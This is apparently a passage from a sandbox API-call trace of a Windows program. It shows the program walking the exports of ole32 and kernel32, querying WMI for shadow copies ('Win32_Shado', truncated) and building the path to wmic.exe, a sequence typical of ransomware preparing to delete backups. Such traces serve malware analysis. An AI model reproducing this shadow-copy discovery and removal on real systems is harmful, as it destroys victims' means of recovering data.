lstrlenA (lpString="CLIPFORMAT_USERSIZE") returned 19 [0178.566] lstrcpyA (in: lpString1=0x239ec04, lpString2="CLIPFORMAT_UserUnmarshal" | out: lpString1="CLIPFORMAT_UserUnmarshal") returned="CLIPFORMAT_UserUnmarshal" [0178.566] lstrlenA (lpString="CLIPFORMAT_USERUNMARSHAL") returned 24 [0178.566] lstrcpyA (in: lpString1=0x239ec04, lpString2="CLSIDFromOle1Class" | out: lpString1="CLSIDFromOle1Class") returned="CLSIDFromOle1Class" [0178.566] lstrlenA (lpString="CLSIDFROMOLE1CLASS") returned 18 [0178.566] lstrcpyA (in: lpString1=0x239ec04, lpString2="CLSIDFromProgID" | out: lpString1="CLSIDFromProgID") returned="CLSIDFromProgID" [0178.566] lstrlenA (lpString="CLSIDFROMPROGID") returned 15 [0178.566] lstrcpyA (in: lpString1=0x239ec04, lpString2="CLSIDFromProgIDEx" | out: lpString1="CLSIDFromProgIDEx") returned="CLSIDFromProgIDEx" [0178.566] lstrlenA (lpString="CLSIDFROMPROGIDEX") returned 17 [0178.566] lstrcpyA (in: lpString1=0x239ec04, lpString2="CLSIDFromString" | out: lpString1="CLSIDFromString") returned="CLSIDFromString" [0178.566] lstrlenA (lpString="CLSIDFROMSTRING") returned 15 [0178.566] lstrcpyA (in: lpString1=0x239ec04, lpString2="CoAddRefServerProcess" | out: lpString1="CoAddRefServerProcess") returned="CoAddRefServerProcess" [0178.566] lstrlenA (lpString="COADDREFSERVERPROCESS") returned 21 [0178.566] lstrcpyA (in: lpString1=0x239ec04, lpString2="CoAllowSetForegroundWindow" | out: lpString1="CoAllowSetForegroundWindow") returned="CoAllowSetForegroundWindow" [0178.566] lstrlenA (lpString="COALLOWSETFOREGROUNDWINDOW") returned 26 [0178.566] lstrcpyA (in: lpString1=0x239ec04, lpString2="CoBuildVersion" | out: lpString1="CoBuildVersion") returned="CoBuildVersion" [0178.566] lstrlenA (lpString="COBUILDVERSION") returned 14 [0178.566] lstrcpyA (in: lpString1=0x239ec04, lpString2="CoCancelCall" | out: lpString1="CoCancelCall") returned="CoCancelCall" [0178.566] lstrlenA (lpString="COCANCELCALL") returned 12 [0178.566] lstrcpyA (in: lpString1=0x239ec04, lpString2="CoCopyProxy" | out: lpString1="CoCopyProxy") returned="CoCopyProxy" [0178.566] lstrlenA (lpString="COCOPYPROXY") returned 11 [0178.566] lstrcpyA (in: lpString1=0x239ec04, lpString2="CoCreateFreeThreadedMarshaler" | out: lpString1="CoCreateFreeThreadedMarshaler") returned="CoCreateFreeThreadedMarshaler" [0178.566] lstrlenA (lpString="COCREATEFREETHREADEDMARSHALER") returned 29 [0178.566] lstrcpyA (in: lpString1=0x239ec04, lpString2="CoCreateGuid" | out: lpString1="CoCreateGuid") returned="CoCreateGuid" [0178.566] lstrlenA (lpString="COCREATEGUID") returned 12 [0178.566] lstrcpyA (in: lpString1=0x239ec04, lpString2="CoCreateInstance" | out: lpString1="CoCreateInstance") returned="CoCreateInstance" [0178.566] lstrlenA (lpString="COCREATEINSTANCE") returned 16 [0178.566] CoCreateInstance (in: rclsid=0xf6d74*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x4401, riid=0xf6d84*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x239f8b4 | out: ppv=0x239f8b4*=0x2550880) returned 0x0 [0178.567] WbemLocator:IWbemLocator:ConnectServer (in: This=0x2550880, strNetworkResource="ROOT\\cimv2", strUser=0x0, strPassword=0x0, strLocale=0x0, lSecurityFlags=0, strAuthority=0x0, pCtx=0x255cff8, ppNamespace=0x239f8a0 | out: ppNamespace=0x239f8a0*=0x255d0e4) returned 0x0 [0178.584] lstrlenA (lpString="ole32.dll") returned 9 [0178.584] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x76d60000 [0178.586] lstrcpyA (in: lpString1=0x239ebf8, lpString2="BindMoniker" | out: lpString1="BindMoniker") returned="BindMoniker" [0178.586] lstrlenA (lpString="BINDMONIKER") returned 11 [0178.586] lstrcpyA (in: lpString1=0x239ebf8, lpString2="CLIPFORMAT_UserFree" | out: lpString1="CLIPFORMAT_UserFree") returned="CLIPFORMAT_UserFree" [0178.586] lstrlenA (lpString="CLIPFORMAT_USERFREE") returned 19 [0178.586] lstrcpyA (in: lpString1=0x239ebf8, lpString2="CLIPFORMAT_UserMarshal" | out: lpString1="CLIPFORMAT_UserMarshal") returned="CLIPFORMAT_UserMarshal" [0178.586] lstrlenA (lpString="CLIPFORMAT_USERMARSHAL") returned 22 [0178.586] lstrcpyA (in: lpString1=0x239ebf8, lpString2="CLIPFORMAT_UserSize" | out: lpString1="CLIPFORMAT_UserSize") returned="CLIPFORMAT_UserSize" [0178.586] lstrlenA (lpString="CLIPFORMAT_USERSIZE") returned 19 [0178.586] lstrcpyA (in: lpString1=0x239ebf8, lpString2="CLIPFORMAT_UserUnmarshal" | out: lpString1="CLIPFORMAT_UserUnmarshal") returned="CLIPFORMAT_UserUnmarshal" [0178.586] lstrlenA (lpString="CLIPFORMAT_USERUNMARSHAL") returned 24 [0178.586] lstrcpyA (in: lpString1=0x239ebf8, lpString2="CLSIDFromOle1Class" | out: lpString1="CLSIDFromOle1Class") returned="CLSIDFromOle1Class" [0178.586] lstrlenA (lpString="CLSIDFROMOLE1CLASS") returned 18 [0178.586] lstrcpyA (in: lpString1=0x239ebf8, lpString2="CLSIDFromProgID" | out: lpString1="CLSIDFromProgID") returned="CLSIDFromProgID" [0178.586] lstrlenA (lpString="CLSIDFROMPROGID") returned 15 [0178.586] lstrcpyA (in: lpString1=0x239ebf8, lpString2="CLSIDFromProgIDEx" | out: lpString1="CLSIDFromProgIDEx") returned="CLSIDFromProgIDEx" [0178.586] lstrlenA (lpString="CLSIDFROMPROGIDEX") returned 17 [0178.586] lstrcpyA (in: lpString1=0x239ebf8, lpString2="CLSIDFromString" | out: lpString1="CLSIDFromString") returned="CLSIDFromString" [0178.587] lstrlenA (lpString="CLSIDFROMSTRING") returned 15 [0178.587] lstrcpyA (in: lpString1=0x239ebf8, lpString2="CoAddRefServerProcess" | out: lpString1="CoAddRefServerProcess") returned="CoAddRefServerProcess" [0178.587] lstrlenA (lpString="COADDREFSERVERPROCESS") returned 21 [0178.587] lstrcpyA (in: lpString1=0x239ebf8, lpString2="CoAllowSetForegroundWindow" | out: lpString1="CoAllowSetForegroundWindow") returned="CoAllowSetForegroundWindow" [0178.587] lstrlenA (lpString="COALLOWSETFOREGROUNDWINDOW") returned 26 [0178.587] lstrcpyA (in: lpString1=0x239ebf8, lpString2="CoBuildVersion" | out: lpString1="CoBuildVersion") returned="CoBuildVersion" [0178.587] lstrlenA (lpString="COBUILDVERSION") returned 14 [0178.587] lstrcpyA (in: lpString1=0x239ebf8, lpString2="CoCancelCall" | out: lpString1="CoCancelCall") returned="CoCancelCall" [0178.587] lstrlenA (lpString="COCANCELCALL") returned 12 [0178.587] lstrcpyA (in: lpString1=0x239ebf8, lpString2="CoCopyProxy" | out: lpString1="CoCopyProxy") returned="CoCopyProxy" [0178.587] lstrlenA (lpString="COCOPYPROXY") returned 11 [0178.587] lstrcpyA (in: lpString1=0x239ebf8, lpString2="CoCreateFreeThreadedMarshaler" | out: lpString1="CoCreateFreeThreadedMarshaler") returned="CoCreateFreeThreadedMarshaler" [0178.587] lstrlenA (lpString="COCREATEFREETHREADEDMARSHALER") returned 29 [0178.587] lstrcpyA (in: lpString1=0x239ebf8, lpString2="CoCreateGuid" | out: lpString1="CoCreateGuid") returned="CoCreateGuid" [0178.587] lstrlenA (lpString="COCREATEGUID") returned 12 [0178.587] lstrcpyA (in: lpString1=0x239ebf8, lpString2="CoCreateInstance" | out: lpString1="CoCreateInstance") returned="CoCreateInstance" [0178.587] lstrlenA (lpString="COCREATEINSTANCE") returned 16 [0178.587] lstrcpyA (in: lpString1=0x239ebf8, lpString2="CoCreateInstanceEx" | out: lpString1="CoCreateInstanceEx") returned="CoCreateInstanceEx" [0178.587] lstrlenA (lpString="COCREATEINSTANCEEX") returned 18 [0178.587] lstrcpyA (in: lpString1=0x239ebf8, lpString2="CoCreateObjectInContext" | out: lpString1="CoCreateObjectInContext") returned="CoCreateObjectInContext" [0178.587] lstrlenA (lpString="COCREATEOBJECTINCONTEXT") returned 23 [0178.587] lstrcpyA (in: lpString1=0x239ebf8, lpString2="CoDeactivateObject" | out: lpString1="CoDeactivateObject") returned="CoDeactivateObject" [0178.587] lstrlenA (lpString="CODEACTIVATEOBJECT") returned 18 [0178.587] lstrcpyA (in: lpString1=0x239ebf8, lpString2="CoDisableCallCancellation" | out: lpString1="CoDisableCallCancellation") returned="CoDisableCallCancellation" [0178.587] lstrlenA (lpString="CODISABLECALLCANCELLATION") returned 25 [0178.587] lstrcpyA (in: lpString1=0x239ebf8, lpString2="CoDisconnectContext" | out: lpString1="CoDisconnectContext") returned="CoDisconnectContext" [0178.587] lstrlenA (lpString="CODISCONNECTCONTEXT") returned 19 [0178.587] lstrcpyA (in: lpString1=0x239ebf8, lpString2="CoDisconnectObject" | out: lpString1="CoDisconnectObject") returned="CoDisconnectObject" [0178.587] lstrlenA (lpString="CODISCONNECTOBJECT") returned 18 [0178.587] lstrcpyA (in: lpString1=0x239ebf8, lpString2="CoDosDateTimeToFileTime" | out: lpString1="CoDosDateTimeToFileTime") returned="CoDosDateTimeToFileTime" [0178.587] lstrlenA (lpString="CODOSDATETIMETOFILETIME") returned 23 [0178.587] lstrcpyA (in: lpString1=0x239ebf8, lpString2="CoEnableCallCancellation" | out: lpString1="CoEnableCallCancellation") returned="CoEnableCallCancellation" [0178.587] lstrlenA (lpString="COENABLECALLCANCELLATION") returned 24 [0178.587] lstrcpyA (in: lpString1=0x239ebf8, lpString2="CoFileTimeNow" | out: lpString1="CoFileTimeNow") returned="CoFileTimeNow" [0178.587] lstrlenA (lpString="COFILETIMENOW") returned 13 [0178.587] lstrcpyA (in: lpString1=0x239ebf8, lpString2="CoFileTimeToDosDateTime" | out: lpString1="CoFileTimeToDosDateTime") returned="CoFileTimeToDosDateTime" [0178.588] lstrlenA (lpString="COFILETIMETODOSDATETIME") returned 23 [0178.588] lstrcpyA (in: lpString1=0x239ebf8, lpString2="CoFreeAllLibraries" | out: lpString1="CoFreeAllLibraries") returned="CoFreeAllLibraries" [0178.588] lstrlenA (lpString="COFREEALLLIBRARIES") returned 18 [0178.588] lstrcpyA (in: lpString1=0x239ebf8, lpString2="CoFreeLibrary" | out: lpString1="CoFreeLibrary") returned="CoFreeLibrary" [0178.588] lstrlenA (lpString="COFREELIBRARY") returned 13 [0178.588] lstrcpyA (in: lpString1=0x239ebf8, lpString2="CoFreeUnusedLibraries" | out: lpString1="CoFreeUnusedLibraries") returned="CoFreeUnusedLibraries" [0178.588] lstrlenA (lpString="COFREEUNUSEDLIBRARIES") returned 21 [0178.588] lstrcpyA (in: lpString1=0x239ebf8, lpString2="CoFreeUnusedLibrariesEx" | out: lpString1="CoFreeUnusedLibrariesEx") returned="CoFreeUnusedLibrariesEx" [0178.588] lstrlenA (lpString="COFREEUNUSEDLIBRARIESEX") returned 23 [0178.588] lstrcpyA (in: lpString1=0x239ebf8, lpString2="CoGetActivationState" | out: lpString1="CoGetActivationState") returned="CoGetActivationState" [0178.588] lstrlenA (lpString="COGETACTIVATIONSTATE") returned 20 [0178.588] lstrcpyA (in: lpString1=0x239ebf8, lpString2="CoGetApartmentID" | out: lpString1="CoGetApartmentID") returned="CoGetApartmentID" [0178.588] lstrlenA (lpString="COGETAPARTMENTID") returned 16 [0178.588] lstrcpyA (in: lpString1=0x239ebf8, lpString2="CoGetApartmentType" | out: lpString1="CoGetApartmentType") returned="CoGetApartmentType" [0178.588] lstrlenA (lpString="COGETAPARTMENTTYPE") returned 18 [0178.588] lstrcpyA (in: lpString1=0x239ebf8, lpString2="CoGetCallContext" | out: lpString1="CoGetCallContext") returned="CoGetCallContext" [0178.588] lstrlenA (lpString="COGETCALLCONTEXT") returned 16 [0178.588] lstrcpyA (in: lpString1=0x239ebf8, lpString2="CoGetCallState" | out: lpString1="CoGetCallState") returned="CoGetCallState" [0178.588] lstrlenA (lpString="COGETCALLSTATE") returned 14 [0178.588] lstrcpyA (in: lpString1=0x239ebf8, lpString2="CoGetCallerTID" | out: lpString1="CoGetCallerTID") returned="CoGetCallerTID" [0178.588] lstrlenA (lpString="COGETCALLERTID") returned 14 [0178.588] lstrcpyA (in: lpString1=0x239ebf8, lpString2="CoGetCancelObject" | out: lpString1="CoGetCancelObject") returned="CoGetCancelObject" [0178.588] lstrlenA (lpString="COGETCANCELOBJECT") returned 17 [0178.588] lstrcpyA (in: lpString1=0x239ebf8, lpString2="CoGetClassObject" | out: lpString1="CoGetClassObject") returned="CoGetClassObject" [0178.588] lstrlenA (lpString="COGETCLASSOBJECT") returned 16 [0178.588] lstrcpyA (in: lpString1=0x239ebf8, lpString2="CoGetClassVersion" | out: lpString1="CoGetClassVersion") returned="CoGetClassVersion" [0178.588] lstrlenA (lpString="COGETCLASSVERSION") returned 17 [0178.588] lstrcpyA (in: lpString1=0x239ebf8, lpString2="CoGetComCatalog" | out: lpString1="CoGetComCatalog") returned="CoGetComCatalog" [0178.588] lstrlenA (lpString="COGETCOMCATALOG") returned 15 [0178.588] lstrcpyA (in: lpString1=0x239ebf8, lpString2="CoGetContextToken" | out: lpString1="CoGetContextToken") returned="CoGetContextToken" [0178.588] lstrlenA (lpString="COGETCONTEXTTOKEN") returned 17 [0178.588] lstrcpyA (in: lpString1=0x239ebf8, lpString2="CoGetCurrentLogicalThreadId" | out: lpString1="CoGetCurrentLogicalThreadId") returned="CoGetCurrentLogicalThreadId" [0178.588] lstrlenA (lpString="COGETCURRENTLOGICALTHREADID") returned 27 [0178.588] lstrcpyA (in: lpString1=0x239ebf8, lpString2="CoGetCurrentProcess" | out: lpString1="CoGetCurrentProcess") returned="CoGetCurrentProcess" [0178.588] lstrlenA (lpString="COGETCURRENTPROCESS") returned 19 [0178.588] lstrcpyA (in: lpString1=0x239ebf8, lpString2="CoGetDefaultContext" | out: lpString1="CoGetDefaultContext") returned="CoGetDefaultContext" [0178.589] lstrlenA (lpString="COGETDEFAULTCONTEXT") returned 19 [0178.589] lstrcpyA (in: lpString1=0x239ebf8, lpString2="CoGetInstanceFromFile" | out: lpString1="CoGetInstanceFromFile") returned="CoGetInstanceFromFile" [0178.589] lstrlenA (lpString="COGETINSTANCEFROMFILE") returned 21 [0178.589] lstrcpyA (in: lpString1=0x239ebf8, lpString2="CoGetInstanceFromIStorage" | out: lpString1="CoGetInstanceFromIStorage") returned="CoGetInstanceFromIStorage" [0178.589] lstrlenA (lpString="COGETINSTANCEFROMISTORAGE") returned 25 [0178.589] lstrcpyA (in: lpString1=0x239ebf8, lpString2="CoGetInterceptor" | out: lpString1="CoGetInterceptor") returned="CoGetInterceptor" [0178.589] lstrlenA (lpString="COGETINTERCEPTOR") returned 16 [0178.589] lstrcpyA (in: lpString1=0x239ebf8, lpString2="CoGetInterceptorFromTypeInfo" | out: lpString1="CoGetInterceptorFromTypeInfo") returned="CoGetInterceptorFromTypeInfo" [0178.589] lstrlenA (lpString="COGETINTERCEPTORFROMTYPEINFO") returned 28 [0178.589] lstrcpyA (in: lpString1=0x239ebf8, lpString2="CoGetInterfaceAndReleaseStream" | out: lpString1="CoGetInterfaceAndReleaseStream") returned="CoGetInterfaceAndReleaseStream" [0178.589] lstrlenA (lpString="COGETINTERFACEANDRELEASESTREAM") returned 30 [0178.589] lstrcpyA (in: lpString1=0x239ebf8, lpString2="CoGetMalloc" | out: lpString1="CoGetMalloc") returned="CoGetMalloc" [0178.589] lstrlenA (lpString="COGETMALLOC") returned 11 [0178.589] lstrcpyA (in: lpString1=0x239ebf8, lpString2="CoGetMarshalSizeMax" | out: lpString1="CoGetMarshalSizeMax") returned="CoGetMarshalSizeMax" [0178.589] lstrlenA (lpString="COGETMARSHALSIZEMAX") returned 19 [0178.589] lstrcpyA (in: lpString1=0x239ebf8, lpString2="CoGetModuleType" | out: lpString1="CoGetModuleType") returned="CoGetModuleType" [0178.589] lstrlenA (lpString="COGETMODULETYPE") returned 15 [0178.589] lstrcpyA (in: lpString1=0x239ebf8, lpString2="CoGetObject" | out: lpString1="CoGetObject") returned="CoGetObject" [0178.589] lstrlenA (lpString="COGETOBJECT") returned 11 [0178.589] lstrcpyA (in: lpString1=0x239ebf8, lpString2="CoGetObjectContext" | out: lpString1="CoGetObjectContext") returned="CoGetObjectContext" [0178.589] lstrlenA (lpString="COGETOBJECTCONTEXT") returned 18 [0178.589] lstrcpyA (in: lpString1=0x239ebf8, lpString2="CoGetPSClsid" | out: lpString1="CoGetPSClsid") returned="CoGetPSClsid" [0178.589] lstrlenA (lpString="COGETPSCLSID") returned 12 [0178.589] lstrcpyA (in: lpString1=0x239ebf8, lpString2="CoGetProcessIdentifier" | out: lpString1="CoGetProcessIdentifier") returned="CoGetProcessIdentifier" [0178.589] lstrlenA (lpString="COGETPROCESSIDENTIFIER") returned 22 [0178.589] lstrcpyA (in: lpString1=0x239ebf8, lpString2="CoGetStandardMarshal" | out: lpString1="CoGetStandardMarshal") returned="CoGetStandardMarshal" [0178.589] lstrlenA (lpString="COGETSTANDARDMARSHAL") returned 20 [0178.589] lstrcpyA (in: lpString1=0x239ebf8, lpString2="CoGetStdMarshalEx" | out: lpString1="CoGetStdMarshalEx") returned="CoGetStdMarshalEx" [0178.589] lstrlenA (lpString="COGETSTDMARSHALEX") returned 17 [0178.589] lstrcpyA (in: lpString1=0x239ebf8, lpString2="CoGetSystemSecurityPermissions" | out: lpString1="CoGetSystemSecurityPermissions") returned="CoGetSystemSecurityPermissions" [0178.589] lstrlenA (lpString="COGETSYSTEMSECURITYPERMISSIONS") returned 30 [0178.589] lstrcpyA (in: lpString1=0x239ebf8, lpString2="CoGetTreatAsClass" | out: lpString1="CoGetTreatAsClass") returned="CoGetTreatAsClass" [0178.589] lstrlenA (lpString="COGETTREATASCLASS") returned 17 [0178.589] lstrcpyA (in: lpString1=0x239ebf8, lpString2="CoImpersonateClient" | out: lpString1="CoImpersonateClient") returned="CoImpersonateClient" [0178.589] lstrlenA (lpString="COIMPERSONATECLIENT") returned 19 [0178.589] lstrcpyA (in: lpString1=0x239ebf8, lpString2="CoInitialize" | out: lpString1="CoInitialize") returned="CoInitialize" [0178.589] lstrlenA (lpString="COINITIALIZE") returned 12 [0178.589] lstrcpyA (in: lpString1=0x239ebf8, lpString2="CoInitializeEx" | out: lpString1="CoInitializeEx") returned="CoInitializeEx" [0178.590] lstrlenA (lpString="COINITIALIZEEX") returned 14 [0178.590] lstrcpyA (in: lpString1=0x239ebf8, lpString2="CoInitializeSecurity" | out: lpString1="CoInitializeSecurity") returned="CoInitializeSecurity" [0178.590] lstrlenA (lpString="COINITIALIZESECURITY") returned 20 [0178.590] lstrcpyA (in: lpString1=0x239ebf8, lpString2="CoInitializeWOW" | out: lpString1="CoInitializeWOW") returned="CoInitializeWOW" [0178.590] lstrlenA (lpString="COINITIALIZEWOW") returned 15 [0178.590] lstrcpyA (in: lpString1=0x239ebf8, lpString2="CoInstall" | out: lpString1="CoInstall") returned="CoInstall" [0178.590] lstrlenA (lpString="COINSTALL") returned 9 [0178.590] lstrcpyA (in: lpString1=0x239ebf8, lpString2="CoInvalidateRemoteMachineBindings" | out: lpString1="CoInvalidateRemoteMachineBindings") returned="CoInvalidateRemoteMachineBindings" [0178.590] lstrlenA (lpString="COINVALIDATEREMOTEMACHINEBINDINGS") returned 33 [0178.590] lstrcpyA (in: lpString1=0x239ebf8, lpString2="CoIsHandlerConnected" | out: lpString1="CoIsHandlerConnected") returned="CoIsHandlerConnected" [0178.590] lstrlenA (lpString="COISHANDLERCONNECTED") returned 20 [0178.590] lstrcpyA (in: lpString1=0x239ebf8, lpString2="CoIsOle1Class" | out: lpString1="CoIsOle1Class") returned="CoIsOle1Class" [0178.590] lstrlenA (lpString="COISOLE1CLASS") returned 13 [0178.590] lstrcpyA (in: lpString1=0x239ebf8, lpString2="CoLoadLibrary" | out: lpString1="CoLoadLibrary") returned="CoLoadLibrary" [0178.590] lstrlenA (lpString="COLOADLIBRARY") returned 13 [0178.590] lstrcpyA (in: lpString1=0x239ebf8, lpString2="CoLockObjectExternal" | out: lpString1="CoLockObjectExternal") returned="CoLockObjectExternal" [0178.590] lstrlenA (lpString="COLOCKOBJECTEXTERNAL") returned 20 [0178.590] lstrcpyA (in: lpString1=0x239ebf8, lpString2="CoMarshalHresult" | out: lpString1="CoMarshalHresult") returned="CoMarshalHresult" [0178.590] lstrlenA (lpString="COMARSHALHRESULT") returned 16 [0178.590] lstrcpyA (in: lpString1=0x239ebf8, lpString2="CoMarshalInterThreadInterfaceInStream" | out: lpString1="CoMarshalInterThreadInterfaceInStream") returned="CoMarshalInterThreadInterfaceInStream" [0178.590] lstrlenA (lpString="COMARSHALINTERTHREADINTERFACEINSTREAM") returned 37 [0178.590] lstrcpyA (in: lpString1=0x239ebf8, lpString2="CoMarshalInterface" | out: lpString1="CoMarshalInterface") returned="CoMarshalInterface" [0178.590] lstrlenA (lpString="COMARSHALINTERFACE") returned 18 [0178.590] lstrcpyA (in: lpString1=0x239ebf8, lpString2="CoPopServiceDomain" | out: lpString1="CoPopServiceDomain") returned="CoPopServiceDomain" [0178.590] lstrlenA (lpString="COPOPSERVICEDOMAIN") returned 18 [0178.590] lstrcpyA (in: lpString1=0x239ebf8, lpString2="CoPushServiceDomain" | out: lpString1="CoPushServiceDomain") returned="CoPushServiceDomain" [0178.590] lstrlenA (lpString="COPUSHSERVICEDOMAIN") returned 19 [0178.590] lstrcpyA (in: lpString1=0x239ebf8, lpString2="CoQueryAuthenticationServices" | out: lpString1="CoQueryAuthenticationServices") returned="CoQueryAuthenticationServices" [0178.590] lstrlenA (lpString="COQUERYAUTHENTICATIONSERVICES") returned 29 [0178.590] lstrcpyA (in: lpString1=0x239ebf8, lpString2="CoQueryClientBlanket" | out: lpString1="CoQueryClientBlanket") returned="CoQueryClientBlanket" [0178.590] lstrlenA (lpString="COQUERYCLIENTBLANKET") returned 20 [0178.590] lstrcpyA (in: lpString1=0x239ebf8, lpString2="CoQueryProxyBlanket" | out: lpString1="CoQueryProxyBlanket") returned="CoQueryProxyBlanket" [0178.590] lstrlenA (lpString="COQUERYPROXYBLANKET") returned 19 [0178.590] lstrcpyA (in: lpString1=0x239ebf8, lpString2="CoQueryReleaseObject" | out: lpString1="CoQueryReleaseObject") returned="CoQueryReleaseObject" [0178.590] lstrlenA (lpString="COQUERYRELEASEOBJECT") returned 20 [0178.590] lstrcpyA (in: lpString1=0x239ebf8, lpString2="CoReactivateObject" | out: lpString1="CoReactivateObject") returned="CoReactivateObject" [0178.591] lstrlenA (lpString="COREACTIVATEOBJECT") returned 18 [0178.591] lstrcpyA (in: lpString1=0x239ebf8, lpString2="CoRegisterChannelHook" | out: lpString1="CoRegisterChannelHook") returned="CoRegisterChannelHook" [0178.591] lstrlenA (lpString="COREGISTERCHANNELHOOK") returned 21 [0178.591] lstrcpyA (in: lpString1=0x239ebf8, lpString2="CoRegisterClassObject" | out: lpString1="CoRegisterClassObject") returned="CoRegisterClassObject" [0178.591] lstrlenA (lpString="COREGISTERCLASSOBJECT") returned 21 [0178.591] lstrcpyA (in: lpString1=0x239ebf8, lpString2="CoRegisterInitializeSpy" | out: lpString1="CoRegisterInitializeSpy") returned="CoRegisterInitializeSpy" [0178.591] lstrlenA (lpString="COREGISTERINITIALIZESPY") returned 23 [0178.591] lstrcpyA (in: lpString1=0x239ebf8, lpString2="CoRegisterMallocSpy" | out: lpString1="CoRegisterMallocSpy") returned="CoRegisterMallocSpy" [0178.591] lstrlenA (lpString="COREGISTERMALLOCSPY") returned 19 [0178.591] lstrcpyA (in: lpString1=0x239ebf8, lpString2="CoRegisterMessageFilter" | out: lpString1="CoRegisterMessageFilter") returned="CoRegisterMessageFilter" [0178.591] lstrlenA (lpString="COREGISTERMESSAGEFILTER") returned 23 [0178.591] lstrcpyA (in: lpString1=0x239ebf8, lpString2="CoRegisterPSClsid" | out: lpString1="CoRegisterPSClsid") returned="CoRegisterPSClsid" [0178.591] lstrlenA (lpString="COREGISTERPSCLSID") returned 17 [0178.591] lstrcpyA (in: lpString1=0x239ebf8, lpString2="CoRegisterSurrogate" | out: lpString1="CoRegisterSurrogate") returned="CoRegisterSurrogate" [0178.591] lstrlenA (lpString="COREGISTERSURROGATE") returned 19 [0178.591] lstrcpyA (in: lpString1=0x239ebf8, lpString2="CoRegisterSurrogateEx" | out: lpString1="CoRegisterSurrogateEx") returned="CoRegisterSurrogateEx" [0178.591] lstrlenA (lpString="COREGISTERSURROGATEEX") returned 21 [0178.591] lstrcpyA (in: lpString1=0x239ebf8, lpString2="CoReleaseMarshalData" | out: lpString1="CoReleaseMarshalData") returned="CoReleaseMarshalData" [0178.591] lstrlenA (lpString="CORELEASEMARSHALDATA") returned 20 [0178.591] lstrcpyA (in: lpString1=0x239ebf8, lpString2="CoReleaseServerProcess" | out: lpString1="CoReleaseServerProcess") returned="CoReleaseServerProcess" [0178.591] lstrlenA (lpString="CORELEASESERVERPROCESS") returned 22 [0178.591] lstrcpyA (in: lpString1=0x239ebf8, lpString2="CoResumeClassObjects" | out: lpString1="CoResumeClassObjects") returned="CoResumeClassObjects" [0178.591] lstrlenA (lpString="CORESUMECLASSOBJECTS") returned 20 [0178.591] lstrcpyA (in: lpString1=0x239ebf8, lpString2="CoRetireServer" | out: lpString1="CoRetireServer") returned="CoRetireServer" [0178.591] lstrlenA (lpString="CORETIRESERVER") returned 14 [0178.591] lstrcpyA (in: lpString1=0x239ebf8, lpString2="CoRevertToSelf" | out: lpString1="CoRevertToSelf") returned="CoRevertToSelf" [0178.591] lstrlenA (lpString="COREVERTTOSELF") returned 14 [0178.591] lstrcpyA (in: lpString1=0x239ebf8, lpString2="CoRevokeClassObject" | out: lpString1="CoRevokeClassObject") returned="CoRevokeClassObject" [0178.591] lstrlenA (lpString="COREVOKECLASSOBJECT") returned 19 [0178.591] lstrcpyA (in: lpString1=0x239ebf8, lpString2="CoRevokeInitializeSpy" | out: lpString1="CoRevokeInitializeSpy") returned="CoRevokeInitializeSpy" [0178.591] lstrlenA (lpString="COREVOKEINITIALIZESPY") returned 21 [0178.591] lstrcpyA (in: lpString1=0x239ebf8, lpString2="CoRevokeMallocSpy" | out: lpString1="CoRevokeMallocSpy") returned="CoRevokeMallocSpy" [0178.591] lstrlenA (lpString="COREVOKEMALLOCSPY") returned 17 [0178.591] lstrcpyA (in: lpString1=0x239ebf8, lpString2="CoSetCancelObject" | out: lpString1="CoSetCancelObject") returned="CoSetCancelObject" [0178.591] lstrlenA (lpString="COSETCANCELOBJECT") returned 17 [0178.591] lstrcpyA (in: lpString1=0x239ebf8, lpString2="CoSetProxyBlanket" | out: lpString1="CoSetProxyBlanket") returned="CoSetProxyBlanket" [0178.591] lstrlenA (lpString="COSETPROXYBLANKET") returned 17 [0178.592] CoSetProxyBlanket (pProxy=0x255d0e4, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x3, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0178.592] IWbemServices:ExecQuery (in: This=0x255d0e4, strQueryLanguage="WQL", strQuery="select * from Win32_Shado", lFlags=48, pCtx=0x0, ppEnum=0x239f8b0 | out: ppEnum=0x239f8b0*=0x255d184) returned 0x0 [0178.607] IEnumWbemClassObject:Next (in: This=0x255d184, lTimeout=-1, uCount=0x1, apObjects=0x239f8ac, puReturned=0x239f89c | out: apObjects=0x239f8ac*=0x0, puReturned=0x239f89c*=0x0) returned 0x80041014 [0179.084] WbemLocator:IUnknown:Release (This=0x255d0e4) returned 0x0 [0179.085] WbemLocator:IUnknown:Release (This=0x2550880) returned 0x0 [0179.085] WbemContext:IUnknown:Release (This=0x255cff8) returned 0x0 [0179.085] CoUninitialize () [0179.085] GetSystemDirectoryW (in: lpBuffer=0x239f978, uSize=0x100 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0179.085] lstrcatW (in: lpString1="C:\\Windows\\system32", lpString2="\\wbem\\wmic.exe" | out: lpString1="C:\\Windows\\system32\\wbem\\wmic.exe") returned="C:\\Windows\\system32\\wbem\\wmic.exe" [0179.085] lstrlenA (lpString="kernel32.dll") returned 12 [0179.086] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x77110000 [0179.086] lstrcpyA (in: lpString1=0x239ec2c, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0179.086] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0179.086] lstrcpyA (in: lpString1=0x239ec2c, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0179.086] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0179.086] lstrcpyA (in: lpString1=0x239ec2c, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0179.086] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0179.086] lstrcpyA (in: lpString1=0x239ec2c, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0179.086] lstrlenA (lpString="ADDATOMA") returned 8 [0179.086] lstrcpyA (in: 